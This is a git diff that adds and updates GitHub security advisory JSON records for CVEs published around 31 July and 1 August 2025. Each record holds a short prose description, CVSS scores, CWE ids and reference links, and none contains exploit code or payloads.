b/advisories/unreviewed/2025/07/GHSA-r8fm-999q-9fw9/GHSA-r8fm-999q-9fw9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8fm-999q-9fw9", + "modified": "2025-07-31T21:31:53Z", + "published": "2025-07-31T21:31:53Z", + "aliases": [ + "CVE-2025-37112" + ], + "details": "A vulnerability was discovered in the storage policy for certain sets of encryption keys in the HPE Telco Network Function Virtual Orchestrator. Successful Exploitation could lead to unauthorized parties gaining access to sensitive system information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-37112" + }, + { + "type": "WEB", + "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04891en_us" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T20:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-rgc6-fx99-2prh/GHSA-rgc6-fx99-2prh.json b/advisories/unreviewed/2025/07/GHSA-rgc6-fx99-2prh/GHSA-rgc6-fx99-2prh.json new file mode 100644 index 0000000000000..bae93fb97ba9f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-rgc6-fx99-2prh/GHSA-rgc6-fx99-2prh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rgc6-fx99-2prh", + "modified": "2025-07-31T21:31:54Z", + "published": "2025-07-31T21:31:54Z", + "aliases": [ + "CVE-2025-37111" + ], + "details": "A vulnerability was discovered in the storage policy for certain sets of authentication keys in the HPE Telco Network Function Virtual Orchestrator. Successful Exploitation could lead to unauthorized parties gaining access to sensitive system information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-37111" + }, + { + "type": "WEB", + "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04891en_us" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T20:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-rq5x-mmcc-mgvx/GHSA-rq5x-mmcc-mgvx.json b/advisories/unreviewed/2025/07/GHSA-rq5x-mmcc-mgvx/GHSA-rq5x-mmcc-mgvx.json new file mode 100644 index 0000000000000..c18c35bd0c927 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-rq5x-mmcc-mgvx/GHSA-rq5x-mmcc-mgvx.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rq5x-mmcc-mgvx", + "modified": "2025-07-31T21:31:53Z", + "published": "2025-07-31T21:31:53Z", + "aliases": [ + "CVE-2025-26064" + ], + "details": "A cross-site scripting (XSS) vulnerability in Intelbras RX1500 v2.2.9 and RX3000 v1.0.11 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the name of a connnected device.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26064" + }, + { + "type": "WEB", + "url": "https://manuais.intelbras.com.br/manual-linha-rx/ChangeLogRX1500.html" + }, + { + "type": "WEB", + "url": "https://manuais.intelbras.com.br/manual-linha-rx/ChangeLogRX3000.html" + }, + { + "type": "WEB", + "url": "https://seclists.org/fulldisclosure/2025/Jul/14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T19:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-v78w-vpxh-p52w/GHSA-v78w-vpxh-p52w.json b/advisories/unreviewed/2025/07/GHSA-v78w-vpxh-p52w/GHSA-v78w-vpxh-p52w.json index 6ff7267f4e2d9..be6613c287499 100644 --- a/advisories/unreviewed/2025/07/GHSA-v78w-vpxh-p52w/GHSA-v78w-vpxh-p52w.json +++ b/advisories/unreviewed/2025/07/GHSA-v78w-vpxh-p52w/GHSA-v78w-vpxh-p52w.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-v78w-vpxh-p52w", - "modified": "2025-07-31T15:35:50Z", + "modified": "2025-07-31T21:31:49Z", "published": "2025-07-31T15:35:50Z", "aliases": [ "CVE-2024-34328" ], "details": "An open redirect in Sielox AnyWare v2.1.2 allows attackers to execute a man-in-the-middle attack via a crafted URL.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T15:15:35Z" diff --git a/advisories/unreviewed/2025/07/GHSA-wc34-p4fh-wr9q/GHSA-wc34-p4fh-wr9q.json b/advisories/unreviewed/2025/07/GHSA-wc34-p4fh-wr9q/GHSA-wc34-p4fh-wr9q.json new file mode 100644 index 0000000000000..dbb9c37154625 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-wc34-p4fh-wr9q/GHSA-wc34-p4fh-wr9q.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wc34-p4fh-wr9q", + "modified": "2025-07-31T21:31:54Z", + "published": "2025-07-31T21:31:54Z", + "aliases": [ + "CVE-2025-50572" + ], + "details": "An issue was discovered in Archer Technology RSA Archer 6.11.00204.10014 allowing attackers to execute arbitrary code via crafted system inputs that would be exported into the CSV and be executed after the user opened the file with compatible applications.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50572" + }, + { + "type": "WEB", + "url": "https://github.com/shorooq-hummdi/Archer-csv-injection-command-exec/blob/main/README.md" + }, + { + "type": "WEB", + "url": "http://archer.com" + }, + { + "type": "WEB", + "url": "http://rsa.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1236" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T20:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-wqcc-7crj-3p76/GHSA-wqcc-7crj-3p76.json b/advisories/unreviewed/2025/07/GHSA-wqcc-7crj-3p76/GHSA-wqcc-7crj-3p76.json index 74e1b95fb8d81..3dd635b340c3e 100644 --- a/advisories/unreviewed/2025/07/GHSA-wqcc-7crj-3p76/GHSA-wqcc-7crj-3p76.json +++ b/advisories/unreviewed/2025/07/GHSA-wqcc-7crj-3p76/GHSA-wqcc-7crj-3p76.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wqcc-7crj-3p76", - "modified": "2025-07-31T18:32:04Z", + "modified": "2025-07-31T21:31:53Z", "published": "2025-07-31T18:32:04Z", "aliases": [ "CVE-2025-51385" ], "details": "D-LINK DI-8200 16.07.26A1 is vulnerable to Buffer Overflow in the yyxz_dlink_asp function via the id parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-121" + ], + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T18:15:42Z" diff --git a/advisories/unreviewed/2025/07/GHSA-wr2x-xq5x-p5vf/GHSA-wr2x-xq5x-p5vf.json b/advisories/unreviewed/2025/07/GHSA-wr2x-xq5x-p5vf/GHSA-wr2x-xq5x-p5vf.json index 30611575120e2..751c32d8de2c2 100644 --- a/advisories/unreviewed/2025/07/GHSA-wr2x-xq5x-p5vf/GHSA-wr2x-xq5x-p5vf.json +++ b/advisories/unreviewed/2025/07/GHSA-wr2x-xq5x-p5vf/GHSA-wr2x-xq5x-p5vf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wr2x-xq5x-p5vf", - "modified": "2025-07-31T18:32:04Z", + "modified": "2025-07-31T21:31:53Z", "published": "2025-07-31T18:32:04Z", "aliases": [ "CVE-2024-34327" ], "details": "Sielox AnyWare v2.1.2 was discovered to contain a SQL injection vulnerability via the email address field of the password reset form.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-31T17:15:29Z" diff --git a/advisories/unreviewed/2025/07/GHSA-x7rh-jcrp-8fwf/GHSA-x7rh-jcrp-8fwf.json b/advisories/unreviewed/2025/07/GHSA-x7rh-jcrp-8fwf/GHSA-x7rh-jcrp-8fwf.json new file mode 100644 index 0000000000000..667cfc235ba3a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-x7rh-jcrp-8fwf/GHSA-x7rh-jcrp-8fwf.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x7rh-jcrp-8fwf", + "modified": "2025-07-31T21:31:53Z", + "published": "2025-07-31T21:31:53Z", + "aliases": [ + "CVE-2025-26062" + ], + "details": "An access control issue in Intelbras RX1500 v2.2.9 and RX3000 v1.0.11 allows unauthenticated attackers to access the router's settings file and obtain potentially sensitive information from the current settings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26062" + }, + { + "type": "WEB", + "url": "https://manuais.intelbras.com.br/manual-linha-rx/ChangeLogRX1500.html" + }, + { + "type": "WEB", + "url": "https://manuais.intelbras.com.br/manual-linha-rx/ChangeLogRX3000.html" + }, + { + "type": "WEB", + "url": "https://seclists.org/fulldisclosure/2025/Jul/14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T19:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-xpf8-484v-j9w6/GHSA-xpf8-484v-j9w6.json b/advisories/unreviewed/2025/07/GHSA-xpf8-484v-j9w6/GHSA-xpf8-484v-j9w6.json new file mode 100644 index 0000000000000..e10606de7fdac --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-xpf8-484v-j9w6/GHSA-xpf8-484v-j9w6.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xpf8-484v-j9w6", + "modified": "2025-07-31T21:31:54Z", + "published": "2025-07-31T21:31:54Z", + "aliases": [ + "CVE-2025-45768" + ], + "details": "pyjwt v2.10.1 was discovered to contain weak encryption.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45768" + }, + { + "type": "WEB", + "url": "https://gist.github.com/ZupeiNie/6f65e564f2067b876321d3dfdbb76569" + }, + { + "type": "WEB", + "url": "https://github.com/jpadilla" + }, + { + "type": "WEB", + "url": "https://github.com/jpadilla/pyjwt" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-311" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T21:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-xxcm-4v4p-f9rr/GHSA-xxcm-4v4p-f9rr.json b/advisories/unreviewed/2025/07/GHSA-xxcm-4v4p-f9rr/GHSA-xxcm-4v4p-f9rr.json new file mode 100644 index 0000000000000..91acf7bc2984d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-xxcm-4v4p-f9rr/GHSA-xxcm-4v4p-f9rr.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xxcm-4v4p-f9rr", + "modified": "2025-07-31T21:31:54Z", + "published": "2025-07-31T21:31:54Z", + "aliases": [ + "CVE-2025-37110" + ], + "details": "A vulnerability was discovered in the storage policy for certain sets of sensitive credential information in the HPE Telco Network Function Virtual Orchestrator. Successful Exploitation could lead to unauthorized parties gaining access to sensitive system information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-37110" + }, + { + "type": "WEB", + "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04891en_us" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-922" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T20:15:32Z" + } +} \ No newline at end of file From bb6dfcc89b22499dcc43fce948f88ea67cdaafbb Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 03:32:51 +0000 Subject: [PATCH 288/323] Publish Advisories GHSA-v8vq-83qq-j3vx GHSA-8qcm-792h-prf3 GHSA-9gfp-jgv5-pg6f --- .../GHSA-v8vq-83qq-j3vx.json | 2 +- .../GHSA-8qcm-792h-prf3.json | 40 +++++++++++++ .../GHSA-9gfp-jgv5-pg6f.json | 56 +++++++++++++++++++ 3 files changed, 97 insertions(+), 1 deletion(-) create mode 100644 advisories/unreviewed/2025/08/GHSA-8qcm-792h-prf3/GHSA-8qcm-792h-prf3.json create mode 100644 advisories/unreviewed/2025/08/GHSA-9gfp-jgv5-pg6f/GHSA-9gfp-jgv5-pg6f.json diff --git a/advisories/unreviewed/2023/07/GHSA-v8vq-83qq-j3vx/GHSA-v8vq-83qq-j3vx.json b/advisories/unreviewed/2023/07/GHSA-v8vq-83qq-j3vx/GHSA-v8vq-83qq-j3vx.json index 36a4e9507bf91..5afac8a1860c9 100644 --- a/advisories/unreviewed/2023/07/GHSA-v8vq-83qq-j3vx/GHSA-v8vq-83qq-j3vx.json +++ b/advisories/unreviewed/2023/07/GHSA-v8vq-83qq-j3vx/GHSA-v8vq-83qq-j3vx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v8vq-83qq-j3vx", - "modified": "2024-04-04T05:55:31Z", + "modified": "2025-08-01T03:31:11Z", "published": "2023-07-11T12:30:35Z", "aliases": [ "CVE-2023-36390" diff --git a/advisories/unreviewed/2025/08/GHSA-8qcm-792h-prf3/GHSA-8qcm-792h-prf3.json b/advisories/unreviewed/2025/08/GHSA-8qcm-792h-prf3/GHSA-8qcm-792h-prf3.json new file mode 100644 index 0000000000000..f639a2cbbc00e --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-8qcm-792h-prf3/GHSA-8qcm-792h-prf3.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8qcm-792h-prf3", + "modified": "2025-08-01T03:31:15Z", + "published": "2025-08-01T03:31:15Z", + "aliases": [ + "CVE-2025-5954" + ], + "details": "The Service Finder SMS System plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 2.0.0. This is due to the plugin not restricting user role selection at the time of registration through the aonesms_fn_savedata_after_signup() function. This makes it possible for unauthenticated attackers to register as an administrator user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5954" + }, + { + "type": "WEB", + "url": "https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/520c1e8b-d0c1-4201-90bf-0cefab9af7e0?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T03:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-9gfp-jgv5-pg6f/GHSA-9gfp-jgv5-pg6f.json b/advisories/unreviewed/2025/08/GHSA-9gfp-jgv5-pg6f/GHSA-9gfp-jgv5-pg6f.json new file mode 100644 index 0000000000000..d8257bc4c1bdd --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-9gfp-jgv5-pg6f/GHSA-9gfp-jgv5-pg6f.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9gfp-jgv5-pg6f", + "modified": "2025-08-01T03:31:15Z", + "published": "2025-08-01T03:31:15Z", + "aliases": [ + "CVE-2025-8431" + ], + "details": "A vulnerability has been found in PHPGurukul Boat Booking System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/add-boat.php. The manipulation of the argument boatname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8431" + }, + { + "type": "WEB", + "url": "https://github.com/shiqumeng/myCVE/issues/3" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318460" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318460" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.625262" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T02:15:25Z" + } +} \ No newline at end of file From c9ee0a6aaf5cad6f3859bec17393629a37598e02 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 06:33:46 +0000 Subject: [PATCH 289/323] Advisory Database Sync --- .../GHSA-3pf7-72q3-3vg2.json | 56 +++++++++++++++++++ .../GHSA-4829-xxxr-9f4f.json | 48 ++++++++++++++++ .../GHSA-5gj2-4cr8-42fj.json | 25 +++++++++ .../GHSA-5wwq-32rw-q57q.json | 25 +++++++++ .../GHSA-77fc-r534-vggp.json | 29 ++++++++++ .../GHSA-839r-7hhg-xhqr.json | 40 +++++++++++++ .../GHSA-92q8-hhvh-7wgw.json | 25 +++++++++ .../GHSA-953m-q75r-54mh.json | 44 +++++++++++++++ .../GHSA-9m93-62q8-9jmx.json | 48 ++++++++++++++++ .../GHSA-c3q9-524g-cc66.json | 25 +++++++++ .../GHSA-c85j-rwrh-2gg7.json | 25 +++++++++ .../GHSA-cx49-pj9h-5v3x.json | 25 +++++++++ .../GHSA-gjwj-2jpg-rvfj.json | 56 +++++++++++++++++++ .../GHSA-hvx5-p2cq-7pwr.json | 52 +++++++++++++++++ .../GHSA-j35f-m58q-8w24.json | 25 +++++++++ .../GHSA-m9c2-6frp-5rqq.json | 40 +++++++++++++ .../GHSA-mw9f-f52p-chpp.json | 29 ++++++++++ .../GHSA-p8qf-v424-747v.json | 25 +++++++++ .../GHSA-vg7v-jh28-wqc4.json | 52 +++++++++++++++++ .../GHSA-w385-9f6g-63qc.json | 34 +++++++++++ .../GHSA-w653-5cx5-9pff.json | 44 +++++++++++++++ .../GHSA-wjw2-c8pq-fw6m.json | 52 +++++++++++++++++ .../GHSA-wwp4-g977-j8h6.json | 25 +++++++++ .../GHSA-x2xx-4qhp-2vqx.json | 40 +++++++++++++ .../GHSA-xvq8-f2vm-qf3p.json | 25 +++++++++ 25 files changed, 914 insertions(+) create mode 100644 advisories/unreviewed/2025/08/GHSA-3pf7-72q3-3vg2/GHSA-3pf7-72q3-3vg2.json create mode 100644 advisories/unreviewed/2025/08/GHSA-4829-xxxr-9f4f/GHSA-4829-xxxr-9f4f.json create mode 100644 advisories/unreviewed/2025/08/GHSA-5gj2-4cr8-42fj/GHSA-5gj2-4cr8-42fj.json create mode 100644 advisories/unreviewed/2025/08/GHSA-5wwq-32rw-q57q/GHSA-5wwq-32rw-q57q.json create mode 100644 advisories/unreviewed/2025/08/GHSA-77fc-r534-vggp/GHSA-77fc-r534-vggp.json create mode 100644 advisories/unreviewed/2025/08/GHSA-839r-7hhg-xhqr/GHSA-839r-7hhg-xhqr.json create mode 100644 advisories/unreviewed/2025/08/GHSA-92q8-hhvh-7wgw/GHSA-92q8-hhvh-7wgw.json create mode 100644 advisories/unreviewed/2025/08/GHSA-953m-q75r-54mh/GHSA-953m-q75r-54mh.json create mode 100644 advisories/unreviewed/2025/08/GHSA-9m93-62q8-9jmx/GHSA-9m93-62q8-9jmx.json create mode 100644 advisories/unreviewed/2025/08/GHSA-c3q9-524g-cc66/GHSA-c3q9-524g-cc66.json create mode 100644 advisories/unreviewed/2025/08/GHSA-c85j-rwrh-2gg7/GHSA-c85j-rwrh-2gg7.json create mode 100644 advisories/unreviewed/2025/08/GHSA-cx49-pj9h-5v3x/GHSA-cx49-pj9h-5v3x.json create mode 100644 advisories/unreviewed/2025/08/GHSA-gjwj-2jpg-rvfj/GHSA-gjwj-2jpg-rvfj.json create mode 100644 advisories/unreviewed/2025/08/GHSA-hvx5-p2cq-7pwr/GHSA-hvx5-p2cq-7pwr.json create mode 100644 advisories/unreviewed/2025/08/GHSA-j35f-m58q-8w24/GHSA-j35f-m58q-8w24.json create mode 100644 advisories/unreviewed/2025/08/GHSA-m9c2-6frp-5rqq/GHSA-m9c2-6frp-5rqq.json create mode 100644 advisories/unreviewed/2025/08/GHSA-mw9f-f52p-chpp/GHSA-mw9f-f52p-chpp.json create mode 100644 advisories/unreviewed/2025/08/GHSA-p8qf-v424-747v/GHSA-p8qf-v424-747v.json create mode 100644 advisories/unreviewed/2025/08/GHSA-vg7v-jh28-wqc4/GHSA-vg7v-jh28-wqc4.json create mode 100644 advisories/unreviewed/2025/08/GHSA-w385-9f6g-63qc/GHSA-w385-9f6g-63qc.json create mode 100644 advisories/unreviewed/2025/08/GHSA-w653-5cx5-9pff/GHSA-w653-5cx5-9pff.json create mode 100644 advisories/unreviewed/2025/08/GHSA-wjw2-c8pq-fw6m/GHSA-wjw2-c8pq-fw6m.json create mode 100644 advisories/unreviewed/2025/08/GHSA-wwp4-g977-j8h6/GHSA-wwp4-g977-j8h6.json create mode 100644 advisories/unreviewed/2025/08/GHSA-x2xx-4qhp-2vqx/GHSA-x2xx-4qhp-2vqx.json create mode 100644 advisories/unreviewed/2025/08/GHSA-xvq8-f2vm-qf3p/GHSA-xvq8-f2vm-qf3p.json diff --git a/advisories/unreviewed/2025/08/GHSA-3pf7-72q3-3vg2/GHSA-3pf7-72q3-3vg2.json b/advisories/unreviewed/2025/08/GHSA-3pf7-72q3-3vg2/GHSA-3pf7-72q3-3vg2.json new file mode 100644 index 0000000000000..8dfa4a22afb28 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-3pf7-72q3-3vg2/GHSA-3pf7-72q3-3vg2.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3pf7-72q3-3vg2", + "modified": "2025-08-01T06:31:37Z", + "published": "2025-08-01T06:31:37Z", + "aliases": [ + "CVE-2025-8434" + ], + "details": "A vulnerability was found in code-projects Online Movie Streaming 1.0. It has been classified as critical. Affected is an unknown function of the file /admin.php. The manipulation of the argument ID leads to missing authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8434" + }, + { + "type": "WEB", + "url": "https://github.com/i-Corner/cve/issues/15" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318462" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318462" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.625534" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-4829-xxxr-9f4f/GHSA-4829-xxxr-9f4f.json b/advisories/unreviewed/2025/08/GHSA-4829-xxxr-9f4f/GHSA-4829-xxxr-9f4f.json new file mode 100644 index 0000000000000..a492b1aa529c7 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-4829-xxxr-9f4f/GHSA-4829-xxxr-9f4f.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4829-xxxr-9f4f", + "modified": "2025-08-01T06:31:37Z", + "published": "2025-08-01T06:31:37Z", + "aliases": [ + "CVE-2025-7845" + ], + "details": "The Stratum – Elementor Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Advanced Google Maps and Image Hotspot widgets in all versions up to, and including, 1.6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7845" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/stratum/tags/1.6.0/includes/templates/image-hotspot.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3335410" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/stratum/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a8d9f6ba-1c41-4933-8eb2-8f27b9e87574?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T05:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-5gj2-4cr8-42fj/GHSA-5gj2-4cr8-42fj.json b/advisories/unreviewed/2025/08/GHSA-5gj2-4cr8-42fj/GHSA-5gj2-4cr8-42fj.json new file mode 100644 index 0000000000000..a0842a43fe8b6 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-5gj2-4cr8-42fj/GHSA-5gj2-4cr8-42fj.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5gj2-4cr8-42fj", + "modified": "2025-08-01T06:31:35Z", + "published": "2025-08-01T06:31:35Z", + "aliases": [ + "CVE-2025-54841" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54841" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T04:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-5wwq-32rw-q57q/GHSA-5wwq-32rw-q57q.json 